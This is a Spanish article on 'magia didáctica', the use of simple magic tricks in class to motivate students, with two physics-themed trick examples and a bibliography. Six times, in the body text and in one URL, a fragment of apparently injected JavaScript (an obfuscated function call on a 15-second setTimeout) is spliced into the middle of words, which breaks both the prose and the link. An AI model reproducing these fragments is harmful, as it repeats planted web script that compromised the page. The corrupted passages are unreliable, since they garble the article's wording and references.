MAGIA DIDÁCTICA

Autor: Sergio González Linares

La magia o ilusionismo se está convirtiendo cada vez más en una habilidad que los profesores aplican a sus clases para fomentar la motivación y el aprendizaje de conceptos en sus alumnos. En este artículo realizamos un breve acercamiento a la utilización de la magia con fines didácticos.

Vivimos en la era de lo tangible, lo inmediato, el exceso de información. Nos hemos acostumbrado a no ser pacientes, a encontrar soluciones y respuestas rápidas, a no ser críticos con la información que nos llega. Esto ha hecho que nuestras neuronas se hayan vuelto perezosas.

Este fenómeno se observa con extremada claridad en nuestras aulas. Alumnos acostumbrados al lenguaje visual, sonoro, a la estimulación de todos sus sentidos, que no encuentran aliciente en las técnicas de estudio y enseñanza tradicionales, que se aburren en clase o, lo que es peor, que ni siquiera entienden lo que se les está explicandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando porque no están acostumbrados a pensar por sí mismos. En cualquier caso, todos ellos son motivos que causan una fuerte falta de motivación por aprender.

La motivación es uno de los pilares principales para que nuestros alumnos puedan aprender los contenidos de las diferentes materias. Un alumno motivado tendrá más facilidad y más interés por formarse, y el profesor se sentirá a su vez más satisfecho con los resultados y más implicado con la labor educativa que tiene que realizar con sus alumnos.

El problema aparece cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando intentamos descubrir cómo imprimir esa motivación a nuestras clases. Un método que se está extendiendo entre los profesores de todos los niveles consiste en añadir la magia o ilusionismo a sus clases. El componente lúdico de la magia atrapa de inmediato la atención y la curiosidad de los alumnos. El asombro que se produce en la resolución del efecto queda grabado en la mente de los alumnos, haciendo mucho más sencillo el aprendizaje de los conceptos que se quieren transmitir.

La magia en clase tiene además muchas otras ventajas:

  • Despierta la agudeza mental.
  • Fomenta la creatividad y la imaginación.
  • Desarrolla el sentido de la observación.
  • Mejora la relación profesor-alumnos.

No se trata de que el profesor se convierta de repente en un mago, sino de utilizar las posibilidades que ofrece la magia para enseñar determinados contenidos. La forma más sencilla de hacerlo consiste en utilizar elementos comunes, preferiblemente materiales que podríamos encontrar en clase, como cartulinas, lápices y bolígrafos, gomas de borrar, etc.

La creatividad del profesor es muy importante en este punto. Como se ha dicho, no se trata de convertir la clase en un espectáculo de magia, sino de utilizar la magia para explicar los conceptos. Pondré dos ejemplos muy sencillos del posible uso de la magia para explicar conceptos en una clase de tecnología.

-       El profesor está enseñandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el cambio de estado de los metales. Explica la fusión, que es el paso de sólido a líquido en los metales, y que un metal llega a ese estado cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando se le aplica calor. Para ilustrarlo, pide una moneda prestada y la calienta un poco con un mechero. A continuación toma un bolígrafo o un lápiz, y atraviesa la moneda por su centro. Explica que ha podido atravesarla porque el calor del mechero ha hecho que la parte central de la moneda se funda. Luego saca el lápiz de la moneda y la muestra de nuevo, pudiendo los alumnos observar que la moneda está intacta. El profesor explica que una vez que el calor de fusión ha desaparecido, el metal se vuelve sólido de nuevo.

-       El profesor muestra una cuerda y una pila. Parte la cuerda en dos trozos y los anuda. Explica que la cuerda es un circuito, y que el nudo de la cuerda se mantendrá en su sitio hasta que apliquemos una corriente a la cuerda, ya que en ese momento el circuito se cerrará y el nudo se separará de la cuerda. Entrega cada extremo de las cuerdas a un alumno de la clase, y el profesor se coloca en medio sujetandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la cuerda cerca del nudo. Pide al primer alumno que ponga el extremo de su cuerda en uno de los polos de la pila, pero no ocurre nada. Luego pide al otro alumno que ponga su extremo en el otro polo, y entonces sí, el nudo cae de la cuerda porque se ha cerrado el circuito.

En internet hay cantidad de sitios donde se pueden aprender juegos de magia sencillos. En el archivo de vídeos Youtube, por ejemplo, se pueden encontrar muchísimos juegos con su explicación correspondiente. También hay universidades y centros de profesores que organizan, cada vez con mayor frecuencia, cursos especializados en los que se enseñan las posibilidades didácticas de la magia. Y los que quieran profundizar pueden acudir a alguna de las tiendas de magia especializadas que hay en varias ciudades españolas, donde podrán encontrar libros y vídeos de todas las ramas de la magia y gran cantidad de artículos de magia. Sólo hace falta algo de creatividad e imaginación para coger un juego de magia y adaptarlo de forma que nos sirva para explicar un concepto determinado.

El uso de la magia en clase cumple varios objetivos: entretiene, emociona, sorprende y educa, y sobre todo, ejerce una fuerte motivación sobre los alumnos y los profesores.

BIBLIOGRAFÍA:

-       http://www.revistaeducativa.es/temas/documentos/la-magia-elemento-motivador-educacion-infantil-722.asp

-       http://www.cepgranada.org/~jmedina/articulos/n1_06/n1_06_03.pdf

-       http://www.hoy.es/v/20110531/sociedad/magia-para-aprender-mejor-20110531.html

-       http://www.hoy.es/v/20100525/badajoz/magia-cuela-aula-20100525.html

-       http://www.diariocordoba.com/noticias/noticia.asp?pkid=379667

-       http://www.elmundo.es/elmundo/2010/07/14/andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andalucia_malaga/1279097784.html

-       http://www.iescarrus.com/edumat/prensa/art2006/art2006_01.htm

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